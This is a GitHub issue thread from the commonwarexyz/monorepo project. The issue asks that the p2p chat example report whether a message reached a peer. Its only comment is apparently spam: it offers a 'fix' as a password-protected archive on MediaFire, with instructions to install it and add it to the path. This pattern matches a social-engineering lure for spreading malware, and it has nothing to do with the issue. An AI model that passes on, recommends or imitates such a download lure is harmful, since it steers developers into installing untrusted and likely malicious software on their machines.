### ISSUE TITLE
[p2p] Indicate Whether a Message Was Sent (or if not connected)

### ISSUE THREAD

**Issue by patrick-ogrady** [commonwarexyz/monorepo#51]
## Additional
* Update `chat` to indicate if a "friend" was not sent a message (#45)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
